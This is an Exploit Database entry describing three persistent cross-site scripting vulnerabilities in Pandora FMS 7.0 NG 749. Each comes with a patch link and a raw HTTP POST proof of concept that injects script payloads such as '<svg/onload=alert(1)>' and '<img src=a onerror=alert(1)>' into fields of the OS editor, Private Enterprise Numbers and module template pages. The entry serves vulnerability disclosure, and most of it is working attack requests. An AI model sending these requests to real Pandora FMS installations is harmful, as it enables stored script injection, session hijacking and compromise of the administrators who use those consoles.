Pandora FMS 7.0 NG 749 – Multiple Persistent Cross-Site Scripting Vulnerabilities

• Exploit Database
• 117 阅读

• 作者： Matthew Aberegg
  日期： 2020-12-01
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49139/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111

  # Exploit Title: Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities # Date: 11-14-2020 # Exploit Author: Matthew Aberegg # Vendor Homepage: https://pandorafms.com/ # Software Link: https://pandorafms.com/community/get-started/ # Version: Pandora FMS 7.0 NG 749 # Tested on: Ubuntu 18.04     # Vulnerability Details # Description : A persistent cross-site scripting vulnerability exists in the "Edit OS" functionality of Pandora FMS. # Vulnerable Parameters : name, description # Patch Link : https://github.com/pandorafms/pandorafms/commit/58f521e8b570802fa33c75f99586e5b01b06731b     #POC   POST /pandora_console/index.php?sec=gsetup&sec2=godmode/setup/os&tab=builder HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 132 Origin: http://TARGET Connection: close Referer: http://TARGET/pandora_console/index.php?sec=gsetup&sec2=godmode/setup/os&tab=builder Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3 Upgrade-Insecure-Requests: 1   name=%3Csvg%2Fonload%3Dalert%281%29%3E&description=%3Csvg%2Fonload%3Dalert%281%29%3E&icon=0&id_os=0&action=save&update_button=Create     ############################################################################################################   # Vulnerability Details # Description : A persistent cross-site scripting vulnerability exists in the "Private Enterprise Numbers" functionality of Pandora FMS. # Vulnerable Parameters : manufacturer, description # Patch Link : https://github.com/pandorafms/pandorafms/commit/b9b94e1382f6e340fd9f3136972cca4373f00eb0     #POC   POST /pandora_console/ajax.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------195778570630678476283866516641 Content-Length: 846 Origin: http://TARGET Connection: close Referer: http://TARGET/pandora_console/index.php?sec=templates&sec2=godmode/modules/private_enterprise_numbers Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3   -----------------------------195778570630678476283866516641 Content-Disposition: form-data; name="is_new"   1 -----------------------------195778570630678476283866516641 Content-Disposition: form-data; name="page"   godmode/modules/private_enterprise_numbers -----------------------------195778570630678476283866516641 Content-Disposition: form-data; name="method"   add -----------------------------195778570630678476283866516641 Content-Disposition: form-data; name="pen"   123 -----------------------------195778570630678476283866516641 Content-Disposition: form-data; name="manufacturer"   <img src=a onerror=alert(1)> -----------------------------195778570630678476283866516641 Content-Disposition: form-data; name="description"   <img src=a onerror=alert(1)> -----------------------------195778570630678476283866516641--     ############################################################################################################   # Vulnerability Details # Description : A persistent cross-site scripting vulnerability exists in the "Module Template Management" functionality of Pandora FMS. # Vulnerable Parameters : name, description # Patch Link : https://github.com/pandorafms/pandorafms/commit/e833c318a5a91d6d709a5b266c1245261b4c0e70     # POC   POST /pandora_console/index.php?sec=gmodules&sec2=godmode/modules/manage_module_templates HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 316 Origin: http://TARGET Connection: close Referer: http://TARGET/pandora_console/index.php?sec=gmodules&sec2=godmode/modules/manage_module_templates Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3 Upgrade-Insecure-Requests: 1   id_np=0&valid-pen=1%2C2%2C4%2C9%2C11%2C63%2C111%2C116%2C123%2C171%2C173%2C188%2C207%2C674%2C2021%2C2636%2C3375%2C3861%2C6486%2C6574%2C8072%2C10002%2C12356%2C13062%2C14988%2C19464%2C41112%2C52627%2C53526%2C&name=%3Csvg%2Fonload%3Dalert%281%29%3E&description=%3Csvg%2Fonload%3Dalert%281%29%3E&pen=&action_button=Create